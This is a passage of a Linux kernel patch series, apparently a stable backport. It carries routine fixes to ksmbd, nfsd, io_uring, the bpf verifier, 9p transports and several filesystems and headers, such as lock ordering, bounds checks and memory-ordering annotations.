+@@ -316,9 +316,12 @@ int ksmbd_conn_handler_loop(void *p)
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+-		conn->request_buf = kvmalloc(size, GFP_KERNEL);
++		conn->request_buf = kvmalloc(size,
++					     GFP_KERNEL |
++					     __GFP_NOWARN |
++					     __GFP_NORETRY);
+ 		if (!conn->request_buf)
+-			continue;
++			break;
+ 
+ 		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
+ 		if (!ksmbd_smb_request(conn))
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index b2fc85d440d03..533742ebcb379 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1926,13 +1926,13 @@ int smb2_tree_connect(struct ksmbd_work *work)
+ 	if (conn->posix_ext_supported)
+ 		status.tree_conn->posix_extensions = true;
+ 
+-out_err1:
+ 	rsp->StructureSize = cpu_to_le16(16);
++	inc_rfc1001_len(work->response_buf, 16);
++out_err1:
+ 	rsp->Capabilities = 0;
+ 	rsp->Reserved = 0;
+ 	/* default manual caching */
+ 	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
+-	inc_rfc1001_len(work->response_buf, 16);
+ 
+ 	if (!IS_ERR(treename))
+ 		kfree(treename);
+@@ -1965,6 +1965,9 @@ out_err1:
+ 		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+ 	}
+ 
++	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
++		smb2_set_err_rsp(work);
++
+ 	return rc;
+ }
+ 
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 63d55f543bd2e..4c6bd0b699791 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -295,6 +295,7 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 	struct msghdr ksmbd_msg;
+ 	struct kvec *iov;
+ 	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
++	int max_retry = 2;
+ 
+ 	iov = get_conn_iovec(t, nr_segs);
+ 	if (!iov)
+@@ -321,9 +322,11 @@ static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+ 		} else if (conn->status == KSMBD_SESS_NEED_RECONNECT) {
+ 			total_read = -EAGAIN;
+ 			break;
+-		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++		} else if ((length == -ERESTARTSYS || length == -EAGAIN) &&
++			   max_retry) {
+ 			usleep_range(1000, 2000);
+ 			length = 0;
++			max_retry--;
+ 			continue;
+ 		} else if (length <= 0) {
+ 			total_read = -EAGAIN;
+diff --git a/fs/locks.c b/fs/locks.c
+index 607f94a0e789f..7dc129cc1a267 100644
+--- a/fs/locks.c
++++ b/fs/locks.c
+@@ -2669,6 +2669,29 @@ int vfs_cancel_lock(struct file *filp, struct file_lock *fl)
+ }
+ EXPORT_SYMBOL_GPL(vfs_cancel_lock);
+ 
++/**
++ * vfs_inode_has_locks - are any file locks held on @inode?
++ * @inode: inode to check for locks
++ *
++ * Return true if there are any FL_POSIX or FL_FLOCK locks currently
++ * set on @inode.
++ */
++bool vfs_inode_has_locks(struct inode *inode)
++{
++	struct file_lock_context *ctx;
++	bool ret;
++
++	ctx = smp_load_acquire(&inode->i_flctx);
++	if (!ctx)
++		return false;
++
++	spin_lock(&ctx->flc_lock);
++	ret = !list_empty(&ctx->flc_posix) || !list_empty(&ctx->flc_flock);
++	spin_unlock(&ctx->flc_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(vfs_inode_has_locks);
++
+ #ifdef CONFIG_PROC_FS
+ #include <linux/proc_fs.h>
+ #include <linux/seq_file.h>
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index bcfeb1a922c0d..78849646fe832 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -3570,6 +3570,17 @@ nfsd4_encode_dirent(void *ccdv, const char *name, int namlen,
+ 	case nfserr_noent:
+ 		xdr_truncate_encode(xdr, start_offset);
+ 		goto skip_entry;
++	case nfserr_jukebox:
++		/*
++		 * The pseudoroot should only display dentries that lead to
++		 * exports. If we get EJUKEBOX here, then we can't tell whether
++		 * this entry should be included. Just fail the whole READDIR
++		 * with NFS4ERR_DELAY in that case, and hope that the situation
++		 * will resolve itself by the client's next attempt.
++		 */
++		if (cd->rd_fhp->fh_export->ex_flags & NFSEXP_V4ROOT)
++			goto fail;
++		fallthrough;
+ 	default:
+ 		/*
+ 		 * If the client requested the RDATTR_ERROR attribute,
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index bfbd9f672f59e..8b1afde192118 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -447,8 +447,8 @@ static void nfsd_shutdown_net(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+-	nfsd_file_cache_shutdown_net(net);
+ 	nfs4_state_shutdown_net(net);
++	nfsd_file_cache_shutdown_net(net);
+ 	if (nn->lockd_up) {
+ 		lockd_down(net);
+ 		nn->lockd_up = false;
+diff --git a/fs/ntfs3/file.c b/fs/ntfs3/file.c
+index 4f2ffc7ef296f..f31c0389a2e7d 100644
+--- a/fs/ntfs3/file.c
++++ b/fs/ntfs3/file.c
+@@ -486,10 +486,10 @@ static int ntfs_truncate(struct inode *inode, loff_t new_size)
+ 
+ 	new_valid = ntfs_up_block(sb, min_t(u64, ni->i_valid, new_size));
+ 
+-	ni_lock(ni);
+-
+ 	truncate_setsize(inode, new_size);
+ 
++	ni_lock(ni);
++
+ 	down_write(&ni->file.run_lock);
+ 	err = attr_set_size(ni, ATTR_DATA, NULL, 0, &ni->file.run, new_size,
+ 			    &new_valid, ni->mi.sbi->options->prealloc, NULL);
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index f713d108f21d3..e92a16435a29e 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -600,7 +600,7 @@ static void udf_do_extend_final_block(struct inode *inode,
+ 	 */
+ 	if (new_elen <= (last_ext->extLength & UDF_EXTENT_LENGTH_MASK))
+ 		return;
+-	added_bytes = (last_ext->extLength & UDF_EXTENT_LENGTH_MASK) - new_elen;
++	added_bytes = new_elen - (last_ext->extLength & UDF_EXTENT_LENGTH_MASK);
+ 	last_ext->extLength += added_bytes;
+ 	UDF_I(inode)->i_lenExtents += added_bytes;
+ 
+diff --git a/include/acpi/video.h b/include/acpi/video.h
+index a275c35e5249d..8ed9bec03e534 100644
+--- a/include/acpi/video.h
++++ b/include/acpi/video.h
+@@ -53,6 +53,7 @@ enum acpi_backlight_type {
+ };
+ 
+ #if IS_ENABLED(CONFIG_ACPI_VIDEO)
++extern void acpi_video_report_nolcd(void);
+ extern int acpi_video_register(void);
+ extern void acpi_video_unregister(void);
+ extern void acpi_video_register_backlight(void);
+@@ -69,6 +70,7 @@ extern int acpi_video_get_levels(struct acpi_device *device,
+ 				 struct acpi_video_device_brightness **dev_br,
+ 				 int *pmax_level);
+ #else
++static inline void acpi_video_report_nolcd(void) { return; };
+ static inline int acpi_video_register(void) { return -ENODEV; }
+ static inline void acpi_video_unregister(void) { return; }
+ static inline void acpi_video_register_backlight(void) { return; }
+diff --git a/include/drm/drm_plane_helper.h b/include/drm/drm_plane_helper.h
+index ff83d26216876..3a574e8cd22f4 100644
+--- a/include/drm/drm_plane_helper.h
++++ b/include/drm/drm_plane_helper.h
+@@ -26,6 +26,7 @@
+ 
+ #include <linux/types.h>
+ 
++struct drm_atomic_state;
+ struct drm_crtc;
+ struct drm_framebuffer;
+ struct drm_modeset_acquire_ctx;
+diff --git a/include/linux/dsa/tag_qca.h b/include/linux/dsa/tag_qca.h
+index b1b5720d89a59..ee657452f122a 100644
+--- a/include/linux/dsa/tag_qca.h
++++ b/include/linux/dsa/tag_qca.h
+@@ -45,8 +45,8 @@ struct sk_buff;
+ 					QCA_HDR_MGMT_COMMAND_LEN + \
+ 					QCA_HDR_MGMT_DATA1_LEN)
+ 
+-#define QCA_HDR_MGMT_DATA2_LEN		12 /* Other 12 byte for the mdio data */
+-#define QCA_HDR_MGMT_PADDING_LEN	34 /* Padding to reach the min Ethernet packet */
++#define QCA_HDR_MGMT_DATA2_LEN		28 /* Other 28 byte for the mdio data */
++#define QCA_HDR_MGMT_PADDING_LEN	18 /* Padding to reach the min Ethernet packet */
+ 
+ #define QCA_HDR_MGMT_PKT_LEN		(QCA_HDR_MGMT_HEADER_LEN + \
+ 					QCA_HDR_LEN + \
+diff --git a/include/linux/efi.h b/include/linux/efi.h
+index 7603fc58c47cd..4aa1dbc7b0646 100644
+--- a/include/linux/efi.h
++++ b/include/linux/efi.h
+@@ -1170,8 +1170,6 @@ void efi_check_for_embedded_firmwares(void);
+ static inline void efi_check_for_embedded_firmwares(void) { }
+ #endif
+ 
+-efi_status_t efi_random_get_seed(void);
+-
+ #define arch_efi_call_virt(p, f, args...)	((p)->f(args))
+ 
+ /*
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 6b115bce14b98..081d1f539628b 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1170,6 +1170,7 @@ extern int locks_delete_block(struct file_lock *);
+ extern int vfs_test_lock(struct file *, struct file_lock *);
+ extern int vfs_lock_file(struct file *, unsigned int, struct file_lock *, struct file_lock *);
+ extern int vfs_cancel_lock(struct file *filp, struct file_lock *fl);
++bool vfs_inode_has_locks(struct inode *inode);
+ extern int locks_lock_inode_wait(struct inode *inode, struct file_lock *fl);
+ extern int __break_lease(struct inode *inode, unsigned int flags, unsigned int type);
+ extern void lease_get_mtime(struct inode *, struct timespec64 *time);
+@@ -1284,6 +1285,11 @@ static inline int vfs_cancel_lock(struct file *filp, struct file_lock *fl)
+ 	return 0;
+ }
+ 
++static inline bool vfs_inode_has_locks(struct inode *inode)
++{
++	return false;
++}
++
+ static inline int locks_lock_inode_wait(struct inode *inode, struct file_lock *fl)
+ {
+ 	return -ENOLCK;
+diff --git a/include/linux/mlx5/device.h b/include/linux/mlx5/device.h
+index 1ff91cb79ded5..2383076a7306c 100644
+--- a/include/linux/mlx5/device.h
++++ b/include/linux/mlx5/device.h
+@@ -1085,6 +1085,11 @@ enum {
+ 	MLX5_VPORT_ADMIN_STATE_AUTO  = 0x2,
+ };
+ 
++enum {
++	MLX5_VPORT_CVLAN_INSERT_WHEN_NO_CVLAN  = 0x1,
++	MLX5_VPORT_CVLAN_INSERT_ALWAYS         = 0x3,
++};
++
+ enum {
+ 	MLX5_L3_PROT_TYPE_IPV4		= 0,
+ 	MLX5_L3_PROT_TYPE_IPV6		= 1,
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index 5a4e914e2a6ff..e45bdec73baf1 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -907,7 +907,8 @@ struct mlx5_ifc_e_switch_cap_bits {
+ 	u8         vport_svlan_insert[0x1];
+ 	u8         vport_cvlan_insert_if_not_exist[0x1];
+ 	u8         vport_cvlan_insert_overwrite[0x1];
+-	u8         reserved_at_5[0x2];
++	u8         reserved_at_5[0x1];
++	u8         vport_cvlan_insert_always[0x1];
+ 	u8         esw_shared_ingress_acl[0x1];
+ 	u8         esw_uplink_ingress_acl[0x1];
+ 	u8         root_ft_on_other_esw[0x1];
+diff --git a/include/linux/netfilter/ipset/ip_set.h b/include/linux/netfilter/ipset/ip_set.h
+index ada1296c87d50..72f5ebc5c97a9 100644
+--- a/include/linux/netfilter/ipset/ip_set.h
++++ b/include/linux/netfilter/ipset/ip_set.h
+@@ -197,7 +197,7 @@ struct ip_set_region {
+ };
+ 
+ /* Max range where every element is added/deleted in one step */
+-#define IPSET_MAX_RANGE		(1<<20)
++#define IPSET_MAX_RANGE		(1<<14)
+ 
+ /* The max revision number supported by any set type + 1 */
+ #define IPSET_REVISION_MAX	9
+diff --git a/include/linux/sunrpc/rpc_pipe_fs.h b/include/linux/sunrpc/rpc_pipe_fs.h
+index cd188a527d169..3b35b6f6533aa 100644
+--- a/include/linux/sunrpc/rpc_pipe_fs.h
++++ b/include/linux/sunrpc/rpc_pipe_fs.h
+@@ -92,6 +92,11 @@ extern ssize_t rpc_pipe_generic_upcall(struct file *, struct rpc_pipe_msg *,
+ 				       char __user *, size_t);
+ extern int rpc_queue_upcall(struct rpc_pipe *, struct rpc_pipe_msg *);
+ 
++/* returns true if the msg is in-flight, i.e., already eaten by the peer */
++static inline bool rpc_msg_is_inflight(const struct rpc_pipe_msg *msg) {
++	return (msg->copied != 0 && list_empty(&msg->list));
++}
++
+ struct rpc_clnt;
+ extern struct dentry *rpc_create_client_dir(struct dentry *, const char *, struct rpc_clnt *);
+ extern int rpc_remove_client_dir(struct rpc_clnt *);
+diff --git a/include/net/inet_hashtables.h b/include/net/inet_hashtables.h
+index 69174093078f0..99bd823e97f62 100644
+--- a/include/net/inet_hashtables.h
++++ b/include/net/inet_hashtables.h
+@@ -108,6 +108,10 @@ struct inet_bind2_bucket {
+ 	struct hlist_node	node;
+ 	/* List of sockets hashed to this bucket */
+ 	struct hlist_head	owners;
++	/* bhash has twsk in owners, but bhash2 has twsk in
++	 * deathrow not to add a member in struct sock_common.
++	 */
++	struct hlist_head	deathrow;
+ };
+ 
+ static inline struct net *ib_net(const struct inet_bind_bucket *ib)
+diff --git a/include/net/inet_timewait_sock.h b/include/net/inet_timewait_sock.h
+index 5b47545f22d39..4a8e578405cb3 100644
+--- a/include/net/inet_timewait_sock.h
++++ b/include/net/inet_timewait_sock.h
+@@ -73,9 +73,14 @@ struct inet_timewait_sock {
+ 	u32			tw_priority;
+ 	struct timer_list	tw_timer;
+ 	struct inet_bind_bucket	*tw_tb;
++	struct inet_bind2_bucket	*tw_tb2;
++	struct hlist_node		tw_bind2_node;
+ };
+ #define tw_tclass tw_tos
+ 
++#define twsk_for_each_bound_bhash2(__tw, list) \
++	hlist_for_each_entry(__tw, list, tw_bind2_node)
++
+ static inline struct inet_timewait_sock *inet_twsk(const struct sock *sk)
+ {
+ 	return (struct inet_timewait_sock *)sk;
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index cdb7db9b0e252..1daededfa75ed 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -311,17 +311,29 @@ struct nft_set_iter {
+ /**
+  *	struct nft_set_desc - description of set elements
+  *
++ *	@ktype: key type
+  *	@klen: key length
++ *	@dtype: data type
+  *	@dlen: data length
++ *	@objtype: object type
++ *	@flags: flags
+  *	@size: number of set elements
++ *	@policy: set policy
++ *	@gc_int: garbage collector interval
+  *	@field_len: length of each field in concatenation, bytes
+  *	@field_count: number of concatenated fields in element
+  *	@expr: set must support for expressions
+  */
+ struct nft_set_desc {
++	u32			ktype;
+ 	unsigned int		klen;
++	u32			dtype;
+ 	unsigned int		dlen;
++	u32			objtype;
+ 	unsigned int		size;
++	u32			policy;
++	u32			gc_int;
++	u64			timeout;
+ 	u8			field_len[NFT_REG32_COUNT];
+ 	u8			field_count;
+ 	bool			expr;
+@@ -580,7 +592,9 @@ void *nft_set_catchall_gc(const struct nft_set *set);
+ 
+ static inline unsigned long nft_set_gc_interval(const struct nft_set *set)
+ {
+-	return set->gc_int ? msecs_to_jiffies(set->gc_int) : HZ;
++	u32 gc_int = READ_ONCE(set->gc_int);
++
++	return gc_int ? msecs_to_jiffies(gc_int) : HZ;
+ }
+ 
+ /**
+@@ -1551,6 +1565,9 @@ struct nft_trans_rule {
+ struct nft_trans_set {
+ 	struct nft_set			*set;
+ 	u32				set_id;
++	u32				gc_int;
++	u64				timeout;
++	bool				update;
+ 	bool				bound;
+ };
+ 
+@@ -1560,6 +1577,12 @@ struct nft_trans_set {
+ 	(((struct nft_trans_set *)trans->data)->set_id)
+ #define nft_trans_set_bound(trans)	\
+ 	(((struct nft_trans_set *)trans->data)->bound)
++#define nft_trans_set_update(trans)	\
++	(((struct nft_trans_set *)trans->data)->update)
++#define nft_trans_set_timeout(trans)	\
++	(((struct nft_trans_set *)trans->data)->timeout)
++#define nft_trans_set_gc_int(trans)	\
++	(((struct nft_trans_set *)trans->data)->gc_int)
+ 
+ struct nft_trans_chain {
+ 	bool				update;
+diff --git a/io_uring/cancel.c b/io_uring/cancel.c
+index 2291a53cdabd1..b4f5dfacc0c31 100644
+--- a/io_uring/cancel.c
++++ b/io_uring/cancel.c
+@@ -288,24 +288,23 @@ int io_sync_cancel(struct io_ring_ctx *ctx, void __user *arg)
+ 
+ 		ret = __io_sync_cancel(current->io_uring, &cd, sc.fd);
+ 
++		mutex_unlock(&ctx->uring_lock);
+ 		if (ret != -EALREADY)
+ 			break;
+ 
+-		mutex_unlock(&ctx->uring_lock);
+ 		ret = io_run_task_work_sig(ctx);
+-		if (ret < 0) {
+-			mutex_lock(&ctx->uring_lock);
++		if (ret < 0)
+ 			break;
+-		}
+ 		ret = schedule_hrtimeout(&timeout, HRTIMER_MODE_ABS);
+-		mutex_lock(&ctx->uring_lock);
+ 		if (!ret) {
+ 			ret = -ETIME;
+ 			break;
+ 		}
++		mutex_lock(&ctx->uring_lock);
+ 	} while (1);
+ 
+ 	finish_wait(&ctx->cq_wait, &wait);
++	mutex_lock(&ctx->uring_lock);
+ 
+ 	if (ret == -ENOENT || ret > 0)
+ 		ret = 0;
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 71f1cabb9f3d4..cea5de98c4232 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1109,13 +1109,18 @@ static void io_req_local_work_add(struct io_kiocb *req)
+ {
+ 	struct io_ring_ctx *ctx = req->ctx;
+ 
+-	if (!llist_add(&req->io_task_work.node, &ctx->work_llist))
++	percpu_ref_get(&ctx->refs);
++
++	if (!llist_add(&req->io_task_work.node, &ctx->work_llist)) {
++		percpu_ref_put(&ctx->refs);
+ 		return;
++	}
+ 	/* need it for the following io_cqring_wake() */
+ 	smp_mb__after_atomic();
+ 
+ 	if (unlikely(atomic_read(&req->task->io_uring->in_idle))) {
+ 		io_move_task_work_from_local(ctx);
++		percpu_ref_put(&ctx->refs);
+ 		return;
+ 	}
+ 
+@@ -1125,6 +1130,7 @@ static void io_req_local_work_add(struct io_kiocb *req)
+ 	if (ctx->has_evfd)
+ 		io_eventfd_signal(ctx);
+ 	__io_cqring_wake(ctx);
++	percpu_ref_put(&ctx->refs);
+ }
+ 
+ static inline void __io_req_task_work_add(struct io_kiocb *req, bool allow_local)
+@@ -2358,7 +2364,7 @@ int io_run_task_work_sig(struct io_ring_ctx *ctx)
+ /* when returns >0, the caller should retry */
+ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 					  struct io_wait_queue *iowq,
+-					  ktime_t timeout)
++					  ktime_t *timeout)
+ {
+ 	int ret;
+ 	unsigned long check_cq;
+@@ -2376,7 +2382,7 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 		if (check_cq & BIT(IO_CHECK_CQ_DROPPED_BIT))
+ 			return -EBADR;
+ 	}
+-	if (!schedule_hrtimeout(&timeout, HRTIMER_MODE_ABS))
++	if (!schedule_hrtimeout(timeout, HRTIMER_MODE_ABS))
+ 		return -ETIME;
+ 	return 1;
+ }
+@@ -2446,7 +2452,7 @@ static int io_cqring_wait(struct io_ring_ctx *ctx, int min_events,
+ 		}
+ 		prepare_to_wait_exclusive(&ctx->cq_wait, &iowq.wq,
+ 						TASK_INTERRUPTIBLE);
+-		ret = io_cqring_wait_schedule(ctx, &iowq, timeout);
++		ret = io_cqring_wait_schedule(ctx, &iowq, &timeout);
+ 		cond_resched();
+ 	} while (ret > 0);
+ 
+@@ -3897,8 +3903,6 @@ static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
+ 		return -EEXIST;
+ 
+ 	if (ctx->restricted) {
+-		if (opcode >= IORING_REGISTER_LAST)
+-			return -EINVAL;
+ 		opcode = array_index_nospec(opcode, IORING_REGISTER_LAST);
+ 		if (!test_bit(opcode, ctx->restrictions.register_op))
+ 			return -EACCES;
+@@ -4054,6 +4058,9 @@ SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
+ 	long ret = -EBADF;
+ 	struct fd f;
+ 
++	if (opcode >= IORING_REGISTER_LAST)
++		return -EINVAL;
++
+ 	f = fdget(fd);
+ 	if (!f.file)
+ 		return -EBADF;
+diff --git a/kernel/bpf/trampoline.c b/kernel/bpf/trampoline.c
+index bf0906e1e2b97..f1504cb5b6e19 100644
+--- a/kernel/bpf/trampoline.c
++++ b/kernel/bpf/trampoline.c
+@@ -489,6 +489,10 @@ again:
+ 		/* reset fops->func and fops->trampoline for re-register */
+ 		tr->fops->func = NULL;
+ 		tr->fops->trampoline = 0;
++
++		/* reset im->image memory attr for arch_prepare_bpf_trampoline */
++		set_memory_nx((long)im->image, 1);
++		set_memory_rw((long)im->image, 1);
+ 		goto again;
+ 	}
+ #endif
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 242fe307032f1..b4d5b343c1912 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -1000,6 +1000,8 @@ static void print_insn_state(struct bpf_verifier_env *env,
+  */
+ static void *copy_array(void *dst, const void *src, size_t n, size_t size, gfp_t flags)
+ {
++	size_t alloc_bytes;
++	void *orig = dst;
+ 	size_t bytes;
+ 
+ 	if (ZERO_OR_NULL_PTR(src))
+@@ -1008,11 +1010,11 @@ static void *copy_array(void *dst, const void *src, size_t n, size_t size, gfp_t
+ 	if (unlikely(check_mul_overflow(n, size, &bytes)))
+ 		return NULL;
+ 
+-	if (ksize(dst) < ksize(src)) {
+-		kfree(dst);
+-		dst = kmalloc_track_caller(kmalloc_size_roundup(bytes), flags);
+-		if (!dst)
+-			return NULL;
++	alloc_bytes = max(ksize(orig), kmalloc_size_roundup(bytes));
++	dst = krealloc(orig, alloc_bytes, flags);
++	if (!dst) {
++		kfree(orig);
++		return NULL;
+ 	}
+ 
+ 	memcpy(dst, src, bytes);
+diff --git a/lib/kunit/string-stream.c b/lib/kunit/string-stream.c
+index a608746020a99..7aeabe1a3dc52 100644
+--- a/lib/kunit/string-stream.c
++++ b/lib/kunit/string-stream.c
+@@ -23,8 +23,10 @@ static struct string_stream_fragment *alloc_string_stream_fragment(
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	frag->fragment = kunit_kmalloc(test, len, gfp);
+-	if (!frag->fragment)
++	if (!frag->fragment) {
++		kunit_kfree(test, frag);
+ 		return ERR_PTR(-ENOMEM);
++	}
+ 
+ 	return frag;
+ }
+diff --git a/net/9p/client.c b/net/9p/client.c
+index b554f8357f967..b5aa25f82b78d 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -443,7 +443,7 @@ void p9_client_cb(struct p9_client *c, struct p9_req_t *req, int status)
+ 	 * the status change is visible to another thread
+ 	 */
+ 	smp_wmb();
+-	req->status = status;
++	WRITE_ONCE(req->status, status);
+ 
+ 	wake_up(&req->wq);
+ 	p9_debug(P9_DEBUG_MUX, "wakeup: %d\n", req->tc.tag);
+@@ -605,7 +605,7 @@ static int p9_client_flush(struct p9_client *c, struct p9_req_t *oldreq)
+ 	/* if we haven't received a response for oldreq,
+ 	 * remove it from the list
+ 	 */
+-	if (oldreq->status == REQ_STATUS_SENT) {
++	if (READ_ONCE(oldreq->status) == REQ_STATUS_SENT) {
+ 		if (c->trans_mod->cancelled)
+ 			c->trans_mod->cancelled(c, oldreq);
+ 	}
+@@ -702,7 +702,8 @@ p9_client_rpc(struct p9_client *c, int8_t type, const char *fmt, ...)
+ 	}
+ again:
+ 	/* Wait for the response */
+-	err = wait_event_killable(req->wq, req->status >= REQ_STATUS_RCVD);
++	err = wait_event_killable(req->wq,
++				  READ_ONCE(req->status) >= REQ_STATUS_RCVD);
+ 
+ 	/* Make sure our req is coherent with regard to updates in other
+ 	 * threads - echoes to wmb() in the callback
+@@ -716,7 +717,7 @@ again:
+ 		goto again;
+ 	}
+ 
+-	if (req->status == REQ_STATUS_ERROR) {
++	if (READ_ONCE(req->status) == REQ_STATUS_ERROR) {
+ 		p9_debug(P9_DEBUG_ERROR, "req_status error %d\n", req->t_err);
+ 		err = req->t_err;
+ 	}
+@@ -729,7 +730,7 @@ again:
+ 			p9_client_flush(c, req);
+ 
+ 		/* if we received the response anyway, don't signal error */
+-		if (req->status == REQ_STATUS_RCVD)
++		if (READ_ONCE(req->status) == REQ_STATUS_RCVD)
+ 			err = 0;
+ 	}
+ recalc_sigpending:
+@@ -798,7 +799,7 @@ static struct p9_req_t *p9_client_zc_rpc(struct p9_client *c, int8_t type,
+ 		if (err != -ERESTARTSYS)
+ 			goto recalc_sigpending;
+ 	}
+-	if (req->status == REQ_STATUS_ERROR) {
++	if (READ_ONCE(req->status) == REQ_STATUS_ERROR) {
+ 		p9_debug(P9_DEBUG_ERROR, "req_status error %d\n", req->t_err);
+ 		err = req->t_err;
+ 	}
+@@ -811,7 +812,7 @@ static struct p9_req_t *p9_client_zc_rpc(struct p9_client *c, int8_t type,
+ 			p9_client_flush(c, req);
+ 
+ 		/* if we received the response anyway, don't signal error */
+-		if (req->status == REQ_STATUS_RCVD)
++		if (READ_ONCE(req->status) == REQ_STATUS_RCVD)
+ 			err = 0;
+ 	}
+ recalc_sigpending:
+diff --git a/net/9p/trans_fd.c b/net/9p/trans_fd.c
+index 07db2f436d44b..5a1aecf7fe487 100644
+--- a/net/9p/trans_fd.c
++++ b/net/9p/trans_fd.c
+@@ -202,11 +202,11 @@ static void p9_conn_cancel(struct p9_conn *m, int err)
+ 
+ 	list_for_each_entry_safe(req, rtmp, &m->req_list, req_list) {
+ 		list_move(&req->req_list, &cancel_list);
+-		req->status = REQ_STATUS_ERROR;
++		WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 	}
+ 	list_for_each_entry_safe(req, rtmp, &m->unsent_req_list, req_list) {
+ 		list_move(&req->req_list, &cancel_list);
+-		req->status = REQ_STATUS_ERROR;
++		WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 	}
+ 
+ 	spin_unlock(&m->req_lock);
+@@ -467,7 +467,7 @@ static void p9_write_work(struct work_struct *work)
+ 
+ 		req = list_entry(m->unsent_req_list.next, struct p9_req_t,
+ 			       req_list);
+-		req->status = REQ_STATUS_SENT;
++		WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 		p9_debug(P9_DEBUG_TRANS, "move req %p\n", req);
+ 		list_move_tail(&req->req_list, &m->req_list);
+ 
+@@ -676,7 +676,7 @@ static int p9_fd_request(struct p9_client *client, struct p9_req_t *req)
+ 		return m->err;
+ 
+ 	spin_lock(&m->req_lock);
+-	req->status = REQ_STATUS_UNSENT;
++	WRITE_ONCE(req->status, REQ_STATUS_UNSENT);
+ 	list_add_tail(&req->req_list, &m->unsent_req_list);
+ 	spin_unlock(&m->req_lock);
+ 
+@@ -703,7 +703,7 @@ static int p9_fd_cancel(struct p9_client *client, struct p9_req_t *req)
+ 
+ 	if (req->status == REQ_STATUS_UNSENT) {
+ 		list_del(&req->req_list);
+-		req->status = REQ_STATUS_FLSHD;
++		WRITE_ONCE(req->status, REQ_STATUS_FLSHD);
+ 		p9_req_put(client, req);
+ 		ret = 0;
+ 	}
+@@ -732,7 +732,7 @@ static int p9_fd_cancelled(struct p9_client *client, struct p9_req_t *req)
+ 	 * remove it from the list.
+ 	 */
+ 	list_del(&req->req_list);
+-	req->status = REQ_STATUS_FLSHD;
++	WRITE_ONCE(req->status, REQ_STATUS_FLSHD);
+ 	spin_unlock(&m->req_lock);
+ 
+ 	p9_req_put(client, req);
+diff --git a/net/9p/trans_rdma.c b/net/9p/trans_rdma.c
+index 6ff706760676e..e9a830c69058c 100644
+--- a/net/9p/trans_rdma.c
++++ b/net/9p/trans_rdma.c
+@@ -507,7 +507,7 @@ dont_need_post_recv:
+ 	 * because doing if after could erase the REQ_STATUS_RCVD
+ 	 * status in case of a very fast reply.
+ 	 */
+-	req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ 	err = ib_post_send(rdma->qp, &wr, NULL);
+ 	if (err)
+ 		goto send_error;
+@@ -517,7 +517,7 @@ dont_need_post_recv:
+ 
+  /* Handle errors that happened during or while preparing the send: */
+  send_error:
+-	req->status = REQ_STATUS_ERROR;
++	WRITE_ONCE(req->status, REQ_STATUS_ERROR);
+ 	kfree(c);
+ 	p9_debug(P9_DEBUG_ERROR, "Error %d in rdma_request()\n", err);
+ 
+diff --git a/net/9p/trans_virtio.c b/net/9p/trans_virtio.c
+index e757f06013043..3f3eb03cda7d6 100644
+--- a/net/9p/trans_virtio.c
++++ b/net/9p/trans_virtio.c
+@@ -263,7 +263,7 @@ p9_virtio_request(struct p9_client *client, struct p9_req_t *req)
+ 
+ 	p9_debug(P9_DEBUG_TRANS, "9p debug: virtio request\n");
+ 
+-	req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ req_retry:
+ 	spin_lock_irqsave(&chan->lock, flags);
+ 
+@@ -469,7 +469,7 @@ p9_virtio_zc_request(struct p9_client *client, struct p9_req_t *req,
+ 			inlen = n;
+ 		}
+ 	}
+-	req->status = REQ_STATUS_SENT;
++	WRITE_ONCE(req->status, REQ_STATUS_SENT);
+ req_retry_pinned:
+ 	spin_lock_irqsave(&chan->lock, flags);
+ 
